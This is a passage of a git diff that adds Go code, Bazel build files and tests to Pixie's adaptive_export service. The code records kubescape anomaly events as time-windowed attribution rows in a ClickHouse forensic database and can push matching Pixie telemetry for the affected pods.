string) ([]*script.ScriptDefinition, error) { - if _, err := os.Stat(dir); os.IsNotExist(err) { - return nil, nil - } - files, err := ioutil.ReadDir(dir) - if err != nil { - return nil, err - } - var l []*script.ScriptDefinition - for _, file := range files { - if strings.HasSuffix(file.Name(), scriptExtension) { - description, err := readScriptDefinition(filepath.Join(dir, file.Name())) - if err != nil { - return nil, err - } - l = append(l, description) - } - } - return l, nil -} - -func readScriptDefinition(path string) (*script.ScriptDefinition, error) { - content, err := ioutil.ReadFile(path) - if err != nil { - return nil, err - } - var definition script.ScriptDefinition - err = yaml.Unmarshal(content, &definition) - if err != nil { - return nil, err - } - return &definition, nil -} diff --git a/src/vizier/services/adaptive_export/internal/controller/BUILD.bazel b/src/vizier/services/adaptive_export/internal/controller/BUILD.bazel new file mode 100644 index 00000000000..62950ba26fa --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/controller/BUILD.bazel @@ -0,0 +1,43 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "controller", + srcs = ["controller.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + "//src/vizier/services/adaptive_export/internal/kubescape", + "//src/vizier/services/adaptive_export/internal/pxl", + "//src/vizier/services/adaptive_export/internal/sink", + "@com_github_sirupsen_logrus//:logrus", + ], +) + +pl_go_test( + name = "controller_test", + srcs = ["controller_test.go"], + embed = [":controller"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + "//src/vizier/services/adaptive_export/internal/kubescape", + "//src/vizier/services/adaptive_export/internal/sink", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/controller/controller.go b/src/vizier/services/adaptive_export/internal/controller/controller.go new file mode 100644 index 00000000000..d9bd97e6ae1 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/controller/controller.go @@ -0,0 +1,420 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package controller orchestrates the adaptive-write push flow on a +// single node: +// +// 1. Subscribe to a Trigger that produces kubescape.Event values. +// 2. For each event, derive the workload anomaly.Target + AnomalyHash, +// look up the in-memory active set for this hostname, and either +// open a new active row or extend an existing one (t_end ← now+after). +// 3. Persist the resulting AttributionRow to ClickHouse via Sink. +// +// The controller does NOT execute PxL itself, does NOT write pixie +// observation rows, and does NOT manage retention scripts. Pixie's +// retention plugin (driven by user-defined PxL scripts in the UI) +// owns those concerns. Operator's only output is forensic_db.adaptive_attribution. +package controller + +import ( + "context" + "sync" + "time" + + log "github.com/sirupsen/logrus" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" +) + +// Trigger is the source of new kubescape events. +type Trigger interface { + Subscribe(ctx context.Context) (<-chan kubescape.Event, error) +} + +// Sink writes attribution rows to ClickHouse and, on boot, can fetch +// still-active rows so the controller can rehydrate after a crash. +// WritePixieRows is the rev-1 fallback path for environments where +// the cloud's retention plugin can't reach the in-cluster CH (so the +// operator queries pixie itself and pushes rows directly). +type Sink interface { + Write(ctx context.Context, rows []sink.AttributionRow) error + QueryActive(ctx context.Context, hostname string) ([]sink.AttributionRow, error) + WritePixieRows(ctx context.Context, table string, rows []map[string]any) error +} + +// PixieQuerier is the rev-1 path's executor: take a PxL string and +// return the resulting rows. nil disables operator-side pixie pushes +// (rev-2 default — the cloud's plugin handles it). +type PixieQuerier interface { + Query(ctx context.Context, pxl string) ([]map[string]any, error) +} + +// Clock abstracts time for tests. +type Clock interface { + Now() time.Time +} + +// RealClock is the production Clock. +type RealClock struct{} + +// Now returns time.Now(). +func (RealClock) Now() time.Time { return time.Now() } + +// Config tunes the controller. Zero values fall through to safe defaults. +type Config struct { + // Hostname is the node-local key. REQUIRED. + Hostname string + + // Before / After form the time window: t_start = event_time - Before, + // t_end = max(t_end, now + After). Both default to 5 min. + Before time.Duration + After time.Duration + + // PushPixieTables, when non-empty alongside a non-nil Pixie querier, + // makes the controller query pixie for every named table on each + // fresh anomaly window and push the result directly to + // forensic_db.
. Used in environments where the cloud's + // retention plugin can't reach the in-cluster CH service. + PushPixieTables []string + + // PushRefreshInterval — how often pushPixieRows re-queries pixie + // while the attribution window is still active. The first query + // covers [t_start, now]; subsequent queries cover only the new + // per-table slice [last_upper[table], now] so we don't duplicate + // rows. Zero (the natural Go default for unset env vars) is + // rewritten to 30s in defaulted(). To DISABLE periodic re-fan-out + // (single-shot mode, which loses pixie traffic that arrives after + // the kubescape event) set this to a NEGATIVE duration — pick -1 + // to be unambiguous. + PushRefreshInterval time.Duration +} + +func (c *Config) defaulted() Config { + out := *c + if out.Before == 0 { + out.Before = 5 * time.Minute + } + if out.After == 0 { + out.After = 5 * time.Minute + } + // Zero → fall through to the 30s default. NEGATIVE values are + // preserved so callers can explicitly request single-shot mode + // (see PushRefreshInterval doc above). + if out.PushRefreshInterval == 0 { + out.PushRefreshInterval = 30 * time.Second + } + return out +} + +// Controller is the live orchestrator. One instance per operator process. +type Controller struct { + trig Trigger + sink Sink + clock Clock + cfg Config + querier PixieQuerier // nil disables operator-side pixie pushes + + mu sync.Mutex + active map[anomaly.AnomalyHash]*sink.AttributionRow +} + +// New wires a Controller. nil clock falls through to RealClock. +// nil querier disables the rev-1 push path (controller will only +// write attribution rows; expects cloud's retention plugin to write +// pixie tables). +func New(trig Trigger, snk Sink, cfg Config, clk Clock) *Controller { + if clk == nil { + clk = RealClock{} + } + return &Controller{ + trig: trig, + sink: snk, + clock: clk, + cfg: cfg.defaulted(), + active: map[anomaly.AnomalyHash]*sink.AttributionRow{}, + } +} + +// WithPixieQuerier wires the rev-1 path. Returns the receiver for +// chaining. Idempotent — call before Run. +func (c *Controller) WithPixieQuerier(q PixieQuerier) *Controller { + c.querier = q + return c +} + +// Rehydrate populates the in-memory active set from ClickHouse so a +// restarted operator picks up where it left off. Idempotent. Call +// once at boot before Run. +func (c *Controller) Rehydrate(ctx context.Context) error { + rows, err := c.sink.QueryActive(ctx, c.cfg.Hostname) + if err != nil { + return err + } + c.mu.Lock() + defer c.mu.Unlock() + for i := range rows { + row := rows[i] + c.active[row.AnomalyHash] = &row + } + log.WithField("rehydrated", len(rows)).Info("controller: active set restored") + return nil +} + +// Run subscribes to the trigger and processes events until ctx is +// cancelled or the trigger closes its channel. Returns ctx.Err() on +// cancellation or nil on graceful trigger shutdown. +func (c *Controller) Run(ctx context.Context) error { + ch, err := c.trig.Subscribe(ctx) + if err != nil { + return err + } + for { + select { + case <-ctx.Done(): + return ctx.Err() + case ev, ok := <-ch: + if !ok { + return nil + } + c.handle(ctx, ev) + } + } +} + +// handle processes one event: open or extend the attribution row, +// then persist to ClickHouse. Errors from Sink.Write are logged but +// not fatal — system stability rule. +func (c *Controller) handle(ctx context.Context, ev kubescape.Event) { + hash := anomaly.Hash(ev.Target) + now := c.clock.Now() + tEvent := eventTimeToTime(ev.EventTime) + + c.mu.Lock() + row, exists := c.active[hash] + if !exists { + row = &sink.AttributionRow{ + AnomalyHash: hash, + Namespace: ev.Target.Namespace, + Pod: ev.Target.Pod, + Comm: ev.Target.Comm, + PID: ev.Target.PID, + Hostname: c.cfg.Hostname, + TStart: tEvent.Add(-c.cfg.Before), + TEnd: now.Add(c.cfg.After), + LastSeen: tEvent, + LastRuleID: ev.RuleID, + NAnomalies: 1, + } + c.active[hash] = row + } else { + // Extend t_end if the new now+after is later. Never shrink. + if proposed := now.Add(c.cfg.After); proposed.After(row.TEnd) { + row.TEnd = proposed + } + // Update last_seen if this event's timestamp is more recent. + if tEvent.After(row.LastSeen) { + row.LastSeen = tEvent + } + row.LastRuleID = ev.RuleID + row.NAnomalies++ + } + snapshot := *row + c.mu.Unlock() + + if err := c.sink.Write(ctx, []sink.AttributionRow{snapshot}); err != nil { + log.WithError(err).Warn("controller: sink write failed") + } + // Rev-1 path: on a NEW window, query pixie for the [t_start, t_end) + // slice of every PushPixieTables table for this (namespace, pod) + // and write rows directly to CH. Done in a goroutine so the + // controller doesn't block on PxL execution (each query can take + // hundreds of ms; 12 tables sequentially would stall the trigger). + if !exists && c.querier != nil && len(c.cfg.PushPixieTables) > 0 { + go c.pushPixieRows(ctx, snapshot) + } +} + +// pushPixieRows fans out per-table PxL queries and writes the results +// to forensic_db.
. One goroutine per anomaly window. The first +// pass covers [t_start, now]; subsequent passes (every +// PushRefreshInterval) cover only the new slice [last_upper, now] so +// pixie traffic that arrives AFTER the initial kubescape event still +// makes it into CH. Loop exits when the (possibly extended) t_end is +// in the past or ctx is cancelled. All failures are logged + non-fatal. +func (c *Controller) pushPixieRows(ctx context.Context, initial sink.AttributionRow) { + target := anomaly.Target{ + PID: initial.PID, + Comm: initial.Comm, + Pod: initial.Pod, + Namespace: initial.Namespace, + } + log.WithFields(log.Fields{ + "hash": initial.AnomalyHash, + "pod": initial.Pod, + "comm": initial.Comm, + "tables": len(c.cfg.PushPixieTables), + "refresh": c.cfg.PushRefreshInterval, + "t_start": initial.TStart, + "t_end": initial.TEnd, + }).Info("pushPixieRows: starting fan-out") + + // Per-table watermark of pixie data we've already pulled for THIS + // hash. We advance a table's cursor only after BOTH the query AND + // the sink-write succeed; failures keep the cursor in place so the + // next pass retries the same slice instead of dropping it. + lastUpper := make(map[string]time.Time, len(c.cfg.PushPixieTables)) + for _, t := range c.cfg.PushPixieTables { + lastUpper[t] = initial.TStart + } + pass := 0 + for { + if ctx.Err() != nil { + return + } + // Re-snapshot the active row each iteration so we pick up t_end + // extensions from concurrent kubescape events (extending the + // window beyond the initial t_end). COPY the row out of the + // shared pointer before releasing the mutex — handle() mutates + // the same struct, so reading TEnd after Unlock would race. + c.mu.Lock() + live, exists := c.active[initial.AnomalyHash] + var current sink.AttributionRow + if exists { + current = *live + } + c.mu.Unlock() + if !exists { + log.WithField("hash", initial.AnomalyHash). + Info("pushPixieRows: window closed (active entry gone)") + return + } + now := c.clock.Now() + if !current.TEnd.After(now) { + log.WithFields(log.Fields{ + "hash": initial.AnomalyHash, + "t_end": current.TEnd, + }).Info("pushPixieRows: fan-out complete (window expired)") + return + } + + pass++ + for _, table := range c.cfg.PushPixieTables { + if ctx.Err() != nil { + return + } + sliceStart := lastUpper[table] + sliceEnd := now + if !sliceEnd.After(sliceStart) { + continue // tiny / inverted slice — skip + } + q, err := pxl.QueryFor(table, target, sliceStart, sliceEnd, now) + if err != nil { + log.WithError(err).WithField("table", table).Warn("controller: QueryFor") + continue + } + qctx, cancel := context.WithTimeout(ctx, 30*time.Second) + rows, err := c.querier.Query(qctx, q) + cancel() + if err != nil { + log.WithError(err).WithField("table", table).Warn("controller: pixie query") + continue // do NOT advance lastUpper — retry next pass + } + if len(rows) > 0 { + if err := c.sink.WritePixieRows(ctx, table, rows); err != nil { + log.WithError(err).WithField("table", table).Warn("controller: pixie row sink") + continue // do NOT advance lastUpper — retry next pass + } + log.WithFields(log.Fields{ + "table": table, + "rows": len(rows), + "hash": initial.AnomalyHash, + "pass": pass, + }).Info("pushed pixie rows for active anomaly window") + } + lastUpper[table] = sliceEnd + } + + // Refresh interval treats negative as "single-shot" so callers + // can opt out via the dedicated negative sentinel; the default + // is 30s, set in defaulted(). Zero is reserved for "use default" + // to keep the env-parsing layer simple (env unset → 0 → default). + if c.cfg.PushRefreshInterval < 0 { + log.WithField("hash", initial.AnomalyHash). + Info("pushPixieRows: fan-out complete (single-shot mode)") + return + } + if !sleepOrCancel(ctx, c.cfg.PushRefreshInterval) { + return + } + } +} + +// sleepOrCancel returns true on normal sleep completion, false if ctx cancelled. +func sleepOrCancel(ctx context.Context, d time.Duration) bool { + t := time.NewTimer(d) + defer t.Stop() + select { + case <-ctx.Done(): + return false + case <-t.C: + return true + } +} + +// Active returns the count of in-memory active hashes (test helper). +func (c *Controller) Active() int { + c.mu.Lock() + defer c.mu.Unlock() + return len(c.active) +} + +// eventTimeToTime converts forensic_db.kubescape_logs.event_time (UInt64) +// into a time.Time, auto-detecting the unit. Vector's kubescape sink in +// the soc lab writes unix SECONDS (~1.7e9), but other deployments may +// emit millis (~1.7e12) or nanos (~1.7e18) per kubescape's own field +// conventions. Magnitude check picks the unit so we don't silently +// misinterpret the same UInt64 across pipeline variants. +func eventTimeToTime(et uint64) time.Time { + switch { + case et < 1e10: + return time.Unix(int64(et), 0).UTC() // seconds + case et < 1e13: + return time.Unix(0, int64(et)*int64(time.Millisecond)).UTC() // millis + default: + return time.Unix(0, int64(et)).UTC() // nanos + } +} + +// PruneExpired removes from the in-memory active set every entry whose +// t_end is in the past. ClickHouse's ReplacingMergeTree handles +// table-side cleanup; this just keeps the operator's RAM bounded. +// Caller invokes on a periodic timer. +func (c *Controller) PruneExpired() int { + now := c.clock.Now() + c.mu.Lock() + defer c.mu.Unlock() + removed := 0 + for h, row := range c.active { + if !row.TEnd.After(now) { + delete(c.active, h) + removed++ + } + } + return removed +} diff --git a/src/vizier/services/adaptive_export/internal/controller/controller_test.go b/src/vizier/services/adaptive_export/internal/controller/controller_test.go new file mode 100644 index 00000000000..325626c9113 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/controller/controller_test.go @@ -0,0 +1,347 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package controller + +import ( + "context" + "errors" + "sync" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" +) + +// ---------- fakes ---------- + +type fakeTrigger struct { + ch chan kubescape.Event + err error +} + +func newFakeTrigger() *fakeTrigger { return &fakeTrigger{ch: make(chan kubescape.Event, 16)} } + +func (f *fakeTrigger) Subscribe(_ context.Context) (<-chan kubescape.Event, error) { + if f.err != nil { + return nil, f.err + } + return f.ch, nil +} + +func (f *fakeTrigger) push(ev kubescape.Event) { f.ch <- ev } +func (f *fakeTrigger) close() { close(f.ch) } + +type fakeSink struct { + mu sync.Mutex + writes []sink.AttributionRow + preload []sink.AttributionRow + werr error + qerr error +} + +func (f *fakeSink) WritePixieRows(_ context.Context, _ string, _ []map[string]any) error { + return nil +} + +func (f *fakeSink) Write(_ context.Context, rows []sink.AttributionRow) error { + f.mu.Lock() + defer f.mu.Unlock() + if f.werr != nil { + return f.werr + } + f.writes = append(f.writes, rows...) + return nil +} + +func (f *fakeSink) QueryActive(_ context.Context, hostname string) ([]sink.AttributionRow, error) { + f.mu.Lock() + defer f.mu.Unlock() + if f.qerr != nil { + return nil, f.qerr + } + out := make([]sink.AttributionRow, 0, len(f.preload)) + for _, r := range f.preload { + if r.Hostname == hostname { + out = append(out, r) + } + } + return out, nil +} + +func (f *fakeSink) snapshot() []sink.AttributionRow { + f.mu.Lock() + defer f.mu.Unlock() + return append([]sink.AttributionRow{}, f.writes...) +} + +type fakeClock struct { + mu sync.Mutex + t time.Time +} + +func (c *fakeClock) Now() time.Time { c.mu.Lock(); defer c.mu.Unlock(); return c.t } +func (c *fakeClock) advance(d time.Duration) { + c.mu.Lock() + defer c.mu.Unlock() + c.t = c.t.Add(d) +} + +// ---------- helpers ---------- + +var canonicalEventTime = time.Unix(0, 1744477360303026359).UTC() + +func canonicalEvent() kubescape.Event { + return kubescape.Event{ + Target: anomaly.Target{ + PID: 106040, Comm: "redis-server", + Pod: "redis-578d5dc9bd-kjj78", Namespace: "redis", + }, + EventTime: 1744477360303026359, + RuleID: "R1005", + Hostname: "node-1", + } +} + +func anotherTargetEvent() kubescape.Event { + ev := canonicalEvent() + ev.Target.PID = 999999 + ev.RuleID = "R0006" + return ev +} + +func waitFor(t *testing.T, what string, deadline time.Duration, ok func() bool) { + t.Helper() + stop := time.Now().Add(deadline) + for time.Now().Before(stop) { + if ok() { + return + } + time.Sleep(2 * time.Millisecond) + } + t.Fatalf("timeout waiting for %s", what) +} + +func runController(t *testing.T, c *Controller, trig *fakeTrigger) func() { + t.Helper() + ctx, cancel := context.WithCancel(context.Background()) + done := make(chan struct{}) + go func() { _ = c.Run(ctx); close(done) }() + return func() { + trig.close() + cancel() + select { + case <-done: + case <-time.After(1 * time.Second): + t.Fatalf("controller did not stop within 1s") + } + } +} + +func defaultCfg() Config { + return Config{Hostname: "node-1", Before: 5 * time.Minute, After: 5 * time.Minute} +} + +// ---------- tests ---------- + +// TestController_NewWindow_FirstAnomalyOnTarget — first event on a hash +// produces one Sink write with t_start = event - Before, t_end = now + After. +func TestController_NewWindow_FirstAnomalyOnTarget(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime.Add(time.Second)} + c := New(trig, snk, defaultCfg(), clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "first write", 200*time.Millisecond, func() bool { return len(snk.snapshot()) > 0 }) + got := snk.snapshot()[0] + wantHash := anomaly.Hash(canonicalEvent().Target) + if got.AnomalyHash != wantHash { + t.Fatalf("hash = %q, want %q", got.AnomalyHash, wantHash) + } + if got.PID != 106040 || got.Comm != "redis-server" || got.Namespace != "redis" { + t.Fatalf("identity wrong: %+v", got) + } + if got.Hostname != "node-1" { + t.Fatalf("Hostname = %q", got.Hostname) + } + wantStart := canonicalEventTime.Add(-5 * time.Minute) + if !got.TStart.Equal(wantStart) { + t.Fatalf("TStart = %v, want %v", got.TStart, wantStart) + } + wantEnd := clk.Now().Add(5 * time.Minute) + if !got.TEnd.Equal(wantEnd) { + t.Fatalf("TEnd = %v, want %v", got.TEnd, wantEnd) + } + if got.NAnomalies != 1 || got.LastRuleID != "R1005" { + t.Fatalf("LastRuleID/NAnomalies wrong: %+v", got) + } +} + +// TestController_Coalesce_SecondAnomalySameHash — second event on the +// same target reuses the same row, increments n_anomalies, extends t_end. +func TestController_Coalesce_SecondAnomalySameHash(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime.Add(time.Second)} + c := New(trig, snk, defaultCfg(), clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "first write", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 1 }) + + clk.advance(2 * time.Minute) // 2 minutes pass; t_end should reset to now+5min + ev2 := canonicalEvent() + ev2.RuleID = "R0006" + ev2.EventTime = uint64(canonicalEventTime.Add(2 * time.Minute).UnixNano()) + trig.push(ev2) + waitFor(t, "second write", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 2 }) + + if c.Active() != 1 { + t.Fatalf("Active = %d, want 1 (must coalesce on same hash)", c.Active()) + } + got := snk.snapshot()[1] + if got.NAnomalies != 2 { + t.Fatalf("NAnomalies = %d, want 2", got.NAnomalies) + } + if got.LastRuleID != "R0006" { + t.Fatalf("LastRuleID = %q, want R0006", got.LastRuleID) + } + wantEnd := clk.Now().Add(5 * time.Minute) + if !got.TEnd.Equal(wantEnd) { + t.Fatalf("TEnd = %v, want %v (must extend on coalesce)", got.TEnd, wantEnd) + } +} + +// TestController_NeverShrinksTEnd — out-of-order arrivals or repeats +// must not regress t_end backward. +func TestController_NeverShrinksTEnd(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + c := New(trig, snk, defaultCfg(), clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "first", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 1 }) + originalEnd := snk.snapshot()[0].TEnd + + // fake clock REWINDS — pathological but defensive + clk.advance(-time.Hour) + trig.push(canonicalEvent()) + waitFor(t, "second", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 2 }) + got := snk.snapshot()[1] + if !got.TEnd.Equal(originalEnd) { + t.Fatalf("TEnd regressed: was %v, now %v", originalEnd, got.TEnd) + } +} + +// TestController_NewWindowForColdTarget — different target opens a 2nd +// active row, preserving the first. +func TestController_NewWindowForColdTarget(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + c := New(trig, snk, defaultCfg(), clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + trig.push(anotherTargetEvent()) + waitFor(t, "two active", 300*time.Millisecond, func() bool { return c.Active() == 2 }) +} + +// TestController_Rehydrate_FromSink — boot reads still-active rows. +func TestController_Rehydrate_FromSink(t *testing.T) { + trig := newFakeTrigger() + t0 := canonicalEventTime + preload := []sink.AttributionRow{ + {AnomalyHash: "h1", Hostname: "node-1", PID: 1, Comm: "x", TStart: t0, TEnd: t0.Add(10 * time.Minute), LastSeen: t0, NAnomalies: 5}, + {AnomalyHash: "h2", Hostname: "node-OTHER", PID: 2, Comm: "y", TStart: t0, TEnd: t0.Add(10 * time.Minute), LastSeen: t0, NAnomalies: 1}, + } + snk := &fakeSink{preload: preload} + clk := &fakeClock{t: t0} + c := New(trig, snk, defaultCfg(), clk) + + if err := c.Rehydrate(context.Background()); err != nil { + t.Fatalf("Rehydrate: %v", err) + } + if c.Active() != 1 { + t.Fatalf("Active after rehydrate = %d, want 1 (must filter by hostname)", c.Active()) + } +} + +// TestController_PruneExpired — entries past their t_end drop out. +func TestController_PruneExpired(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + c := New(trig, snk, Config{Hostname: "node-1", Before: time.Minute, After: time.Minute}, clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "active=1", 200*time.Millisecond, func() bool { return c.Active() == 1 }) + + clk.advance(2 * time.Minute) // past t_end (now+1min) + if r := c.PruneExpired(); r != 1 { + t.Fatalf("PruneExpired removed %d, want 1", r) + } + if c.Active() != 0 { + t.Fatalf("Active after prune = %d, want 0", c.Active()) + } +} + +// TestController_SinkErrorNonFatal — controller does not crash on Sink.Write error. +func TestController_SinkErrorNonFatal(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{werr: errors.New("ch unreachable")} + clk := &fakeClock{t: canonicalEventTime} + c := New(trig, snk, defaultCfg(), clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + // Wait for the handler to process the event (no fixed sleep). + waitFor(t, "active=1 despite sink error", 200*time.Millisecond, func() bool { return c.Active() == 1 }) +} + +// TestController_RestartMidStream_Aborts — context cancel terminates Run. +func TestController_RestartMidStream_Aborts(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + c := New(trig, snk, defaultCfg(), clk) + + ctx, cancel := context.WithCancel(context.Background()) + done := make(chan struct{}) + go func() { _ = c.Run(ctx); close(done) }() + + trig.push(canonicalEvent()) + waitFor(t, "controller picked up event", 200*time.Millisecond, func() bool { return c.Active() == 1 }) + cancel() + select { + case <-done: + case <-time.After(300 * time.Millisecond): + t.Fatalf("controller did not abort within 300ms of cancel") + } +} diff --git a/src/vizier/services/adaptive_export/internal/e2e/BUILD.bazel b/src/vizier/services/adaptive_export/internal/e2e/BUILD.bazel new file mode 100644 index 00000000000..c9d81d75063 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/e2e/BUILD.bazel @@ -0,0 +1,28 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("//bazel:pl_build_system.bzl", "pl_go_test") + +pl_go_test( + name = "e2e_test", + srcs = ["e2e_test.go"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + "//src/vizier/services/adaptive_export/internal/controller", + "//src/vizier/services/adaptive_export/internal/sink", + "//src/vizier/services/adaptive_export/internal/trigger", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/e2e/e2e_test.go b/src/vizier/services/adaptive_export/internal/e2e/e2e_test.go new file mode 100644 index 00000000000..71b7fc6cfbc --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/e2e/e2e_test.go @@ -0,0 +1,169 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package e2e wires the real Trigger + real Sink (both HTTP-backed) +// to a stub ClickHouse in-process and exercises the full +// kubescape→attribution path end-to-end. This is the highest-fidelity +// test that runs in `go test`. Real-cluster validation lives on the +// lab. +package e2e + +import ( + "bytes" + "context" + "encoding/json" + "io" + "net/http" + "net/http/httptest" + "strings" + "sync" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger" +) + +// stubClickHouse emulates ClickHouse's HTTP interface: GET responds +// with a fixed kubescape_logs JSONEachRow body; POST records the +// INSERT body for later assertion. +type stubClickHouse struct { + mu sync.Mutex + kubescape []map[string]any + insertedSQL []string + insertBody [][]byte +} + +func (s *stubClickHouse) handle(w http.ResponseWriter, r *http.Request) { + q := r.URL.Query().Get("query") + switch r.Method { + case http.MethodGet: + if !strings.Contains(q, "FROM forensic_db.kubescape_logs") { + http.Error(w, "unexpected SELECT: "+q, 400) + return + } + if !strings.Contains(q, "hostname = 'node-1'") { + http.Error(w, "missing hostname filter: "+q, 400) + return + } + s.mu.Lock() + var buf bytes.Buffer + enc := json.NewEncoder(&buf) + enc.SetEscapeHTML(false) + for _, row := range s.kubescape { + _ = enc.Encode(row) + } + s.mu.Unlock() + w.WriteHeader(200) + _, _ = w.Write(buf.Bytes()) + case http.MethodPost: + body, _ := io.ReadAll(r.Body) + s.mu.Lock() + s.insertedSQL = append(s.insertedSQL, q) + s.insertBody = append(s.insertBody, body) + s.mu.Unlock() + w.WriteHeader(200) + default: + http.Error(w, "method", http.StatusMethodNotAllowed) + } +} + +func (s *stubClickHouse) bodies() [][]byte { + s.mu.Lock() + defer s.mu.Unlock() + out := make([][]byte, len(s.insertBody)) + for i, b := range s.insertBody { + out[i] = append([]byte{}, b...) + } + return out +} + +func canonicalKubescapeRow() map[string]any { + return map[string]any{ + "RuleID": "R1005", + "RuntimeK8sDetails": `{"podName":"redis-578d5dc9bd-kjj78","podNamespace":"redis"}`, + "RuntimeProcessDetails": `{"processTree":{"pid":106040,"comm":"redis-server"}}`, + "event_time": "1744477360303026359", + "hostname": "node-1", + } +} + +// TestE2E_PushFlow_AttributionRowArrives — full chain: stub-CH serves a +// kubescape row → real Trigger discovers and parses → real Controller +// computes hash + opens active row → real Sink HTTP-POSTs INSERT to +// adaptive_attribution. Assert the resulting body carries the right hash. +func TestE2E_PushFlow_AttributionRowArrives(t *testing.T) { + stub := &stubClickHouse{kubescape: []map[string]any{canonicalKubescapeRow()}} + srv := httptest.NewServer(http.HandlerFunc(stub.handle)) + defer srv.Close() + + trg, err := trigger.New(trigger.Config{ + Endpoint: srv.URL, + Hostname: "node-1", + PollInterval: 30 * time.Millisecond, + }) + if err != nil { + t.Fatalf("trigger.New: %v", err) + } + snk, err := sink.New(sink.Config{Endpoint: srv.URL}) + if err != nil { + t.Fatalf("sink.New: %v", err) + } + cfg := controller.Config{Hostname: "node-1", Before: time.Minute, After: time.Minute} + ctl := controller.New(trg, snk, cfg, nil) + + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + done := make(chan struct{}) + go func() { _ = ctl.Run(ctx); close(done) }() + + deadline := time.Now().Add(2 * time.Second) + for time.Now().Before(deadline) && 